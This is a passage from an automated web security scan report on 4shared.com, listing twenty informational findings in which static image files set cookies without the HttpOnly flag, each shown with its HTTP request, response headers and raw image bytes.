Content-Type: image/gif
Content-Length: 724
Date: Fri, 29 Jul 2011 14:07:56 GMT

GIF89a2................................................................................................................................................................................................
...[SNIP]...

6.47. http://www.4shared.com/images/butJoinNow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/butJoinNow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butJoinNow.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:05 GMT; Path=/
Set-Cookie: hostid=897061432; Expires=Mon, 26-Jul-2021 14:08:05 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:05 GMT
ETag: W/"1366-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1366
Date: Fri, 29 Jul 2011 14:08:05 GMT

GIF89av......gf~. Y..........................................................................................Xa..:m......mt.hp.bj..,b...y....\e....dl. -c!.dGQ~...fn.......S\.U^..........:Ev......MW.n
...[SNIP]...

6.48. http://www.4shared.com/images/butLogin.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/butLogin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/butLogin.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=1765539105; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"1352-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1352
Date: Fri, 29 Jul 2011 14:07:54 GMT

GIF89aD................................................................................................................................................................................................
...[SNIP]...

6.49. http://www.4shared.com/images/cornerBL.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerBL.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBL.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:56 GMT; Path=/
Set-Cookie: hostid=1300466186; Expires=Mon, 26-Jul-2021 14:09:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:56 GMT
ETag: W/"660-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 660
Date: Fri, 29 Jul 2011 14:09:56 GMT

GIF89a.....R.~.|}.PQU{|~^_axy||}hikyz}z{~rsu[\^mnpwx{deguvy{|qruvwytuxijmnor......\]_efilmostvOPS`acoprmnq...bceUVYQRU]^`hil~~....ghjstwTUW......TUX......_`c........z{}......lmp...fgjyy|...Z[]...t
...[SNIP]...

6.50. http://www.4shared.com/images/cornerBL2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerBL2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBL2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:59 GMT; Path=/
Set-Cookie: hostid=861766072; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:59 GMT
ETag: W/"551-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 551
Date: Fri, 29 Jul 2011 14:07:59 GMT

GIF89a.......~.NOS............}~.~.|}|}.{|z{}abdnorfgivwyxy{yz}bceklnstwRSVpqtwxzuvyhil...mnqpqs..........................._`c............tuxmnp.....PQU..._`b...ops...XY\.........lmp......}~....V
...[SNIP]...

6.51. http://www.4shared.com/images/cornerBR.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerBR.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBR.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:53 GMT; Path=/
Set-Cookie: hostid=-1202501898; Expires=Mon, 26-Jul-2021 14:09:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:53 GMT
ETag: W/"662-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 662
Date: Fri, 29 Jul 2011 14:09:53 GMT

GIF89a.....Q.~.|}.PQUqru^_axy|hik{|~yz}z{~[\^|}rsuwx{tuxdeg{|uvyvwymnpbce]^`norefihilstvz{}...QRUlmo`acOPSmnqfgjijm~~.UVYoprghj\]_...Z[]...lmpvwz......stw........................TUX...............t
...[SNIP]...

6.52. http://www.4shared.com/images/cornerBR2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerBR2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerBR2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:00 GMT; Path=/
Set-Cookie: hostid=896634218; Expires=Mon, 26-Jul-2021 14:08:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:00 GMT
ETag: W/"567-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 567
Date: Fri, 29 Jul 2011 14:07:59 GMT

GIF89a.......~.NOS............}~.~.|}|}.z{}abd{|pqtRSV...vwyyz}hiluvystw...pqs^_aklnfgiwxzmnq........................mnp...xy{bce......wx{......qru.....lmp......opstuwWXZvwz...}~.XY\jkm...PQUQRUy
...[SNIP]...

6.53. http://www.4shared.com/images/cornerTL.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerTL.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTL.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:51 GMT; Path=/
Set-Cookie: hostid=-1473538100; Expires=Mon, 26-Jul-2021 14:09:51 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:51 GMT
ETag: W/"407-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 407
Date: Fri, 29 Jul 2011 14:09:51 GMT

GIF89a.....0.~.|}stwyz|{|~fgj|}.wxz}~.rsvijmvwzbce^_almolmpuvx}~.oprrsughk\]_qru...stv......WX\............{|xy{...tuwpqsfgiqrtZ[]~.vwy......z{}z{~NOS~............................................
...[SNIP]...

6.54. http://www.4shared.com/images/cornerTL3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerTL3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTL3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=-255945651; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"644-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 644
Date: Fri, 29 Jul 2011 14:07:53 GMT

GIF89a..........~.|}{|~|}.wxzstwfgjyz|}~....oprbcelmpijm^_almoqru\]_vwzrsv}~.uvxrsughk..................!

............{|........................gXS...:,,...xy{.........WX\tuwstvI91<..pqsfgiqrtZ[]~
...[SNIP]...

6.55. http://www.4shared.com/images/cornerTL6.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerTL6.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTL6.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:02 GMT; Path=/
Set-Cookie: hostid=1302497509; Expires=Mon, 26-Jul-2021 14:08:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:02 GMT
ETag: W/"697-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 697
Date: Fri, 29 Jul 2011 14:08:01 GMT

GIF89a.......~.NOSz{~z{}......vwyZ[]~.qrtfgipqsX_cY_`U\`Y_c~.X]a|}W]a{|~stwW__X`]yz|X]_wxz|}.fgjY`d}~.Y`eX``ey....h|................cw}lmpqrudxrsu...}~.ijmbce\]_rsv]lo......ghkX\copruvx^_avwzlmoX
...[SNIP]...

6.56. http://www.4shared.com/images/cornerTR.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/cornerTR.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cornerTR.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:54 GMT; Path=/
Set-Cookie: hostid=182102692; Expires=Mon, 26-Jul-2021 14:07:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:54 GMT
ETag: W/"409-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 409
Date: Fri, 29 Jul 2011 14:07:54 GMT

GIF89a.....4.~.|}{|~stw|}.fgjwxz}~.yz|vwzqruijmlmorsv^_auvxbceghkrsulmp}~.\]_oprz{|pqtvwxyz{.........{|...............WX\tuxstvxy{pqsvwyfgiqrt~.Z[]......~.z{}z{~NOS...............................
...[SNIP]...

6.57. http://www.4shared.com/images/crn1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/crn1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/crn1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:58 GMT; Path=/
Set-Cookie: hostid=-754302653; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:58 GMT
ETag: W/"616-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 616
Date: Fri, 29 Jul 2011 14:07:58 GMT

GIF89a..&....~.......z{}NOSfgiZ[]qrtXY\wxz~....}~.pqs...stw`adijm|}STX...~.pqt...{|fgj...{{}|}.......lmpvwyxy{VVZbcePPT{|~wwzqruyz}hil...uvyZ[_............RSV...klncdgttw...mnpabd......yz{...VWZ}
...[SNIP]...

6.58. http://www.4shared.com/images/crn2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/crn2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/crn2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:59 GMT; Path=/
Set-Cookie: hostid=-364190340; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:59 GMT
ETag: W/"416-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 416
Date: Fri, 29 Jul 2011 14:07:58 GMT

GIF89a..&....~..........z{}NOSfgiZ[]qrt}~.{||}.pqt~.|}stwvwyhiluvybceklnwxzRSV^_ayz}qrupqsabd\]_mnpjkmz{~hikxy{ghj...stvXY\PQUopsWXZlmp{|~rsu...}~.QRU...yy|...[\^tuwwx{............................
...[SNIP]...

6.59. http://www.4shared.com/images/crn3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/crn3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/crn3.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:58 GMT; Path=/
Set-Cookie: hostid=628810834; Expires=Mon, 26-Jul-2021 14:07:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:58 GMT
ETag: W/"1085-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1085
Date: Fri, 29 Jul 2011 14:07:57 GMT

GIF89a..&.......NOSfgimnpZ[]pqswxz~.z{}pqt|}}~.XY\uvyabdstw~.cdgRSVhil...SUX...`adtuw^_afgj...xy{...[[_klnvwybce......{|QSV{{}yy|\]_...jjm^^bz{~mmqlmpqruopsPQUPPTnnpyz}VWZ......ghjhikjkm|}.......[
...[SNIP]...

6.60. http://www.4shared.com/images/div2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/div2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/div2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:59 GMT; Path=/
Set-Cookie: hostid=-1038299048; Expires=Mon, 26-Jul-2021 14:07:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:59 GMT
ETag: W/"345-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 345
Date: Fri, 29 Jul 2011 14:07:59 GMT

GIF89a.......~..........~.|}}~.z{}pqtuvyabdklnhilRSV|}.stwfgiwxzpqs^_avwyxy{bcejkmNOSqrumnpyz}tuwXY\QRUopsPQUz{~lmp{|yy|...WXZ...VWZ_`b...xy|mmp............nor.....................................
...[SNIP]...

6.61. http://www.4shared.com/images/divtop.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/divtop.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/divtop.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=161347362; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"124-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 124
Date: Fri, 29 Jul 2011 14:07:53 GMT

GIF89a.........................vwyqrtz{}NOSpqsfgi~.Z[]z{~...!.......,..........)P.i.u8....G(.d..h...Q........m.9O...P..D..;

6.62. http://www.4shared.com/images/docImg1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/docImg1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docImg1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:02 GMT; Path=/
Set-Cookie: hostid=2111058953; Expires=Mon, 26-Jul-2021 14:08:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:02 GMT
ETag: W/"1734-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 1734
Date: Fri, 29 Jul 2011 14:08:01 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

6.63. http://www.4shared.com/images/docImg2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/docImg2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docImg2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:03 GMT; Path=/
Set-Cookie: hostid=2006046; Expires=Mon, 26-Jul-2021 14:08:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:03 GMT
ETag: W/"835-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 835
Date: Fri, 29 Jul 2011 14:08:03 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

6.64. http://www.4shared.com/images/docImg4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/docImg4.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docImg4.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:04 GMT; Path=/
Set-Cookie: hostid=-1009900101; Expires=Mon, 26-Jul-2021 14:08:04 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:04 GMT
ETag: W/"15891-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 15891
Date: Fri, 29 Jul 2011 14:08:03 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

6.65. http://www.4shared.com/images/docScr1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/docScr1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/docScr1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:09 GMT; Path=/
Set-Cookie: hostid=-1269996174; Expires=Mon, 26-Jul-2021 14:08:09 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:09 GMT
ETag: W/"9660-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 9660
Date: Fri, 29 Jul 2011 14:08:08 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

6.66. http://www.4shared.com/images/feat1doc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/feat1doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/feat1doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
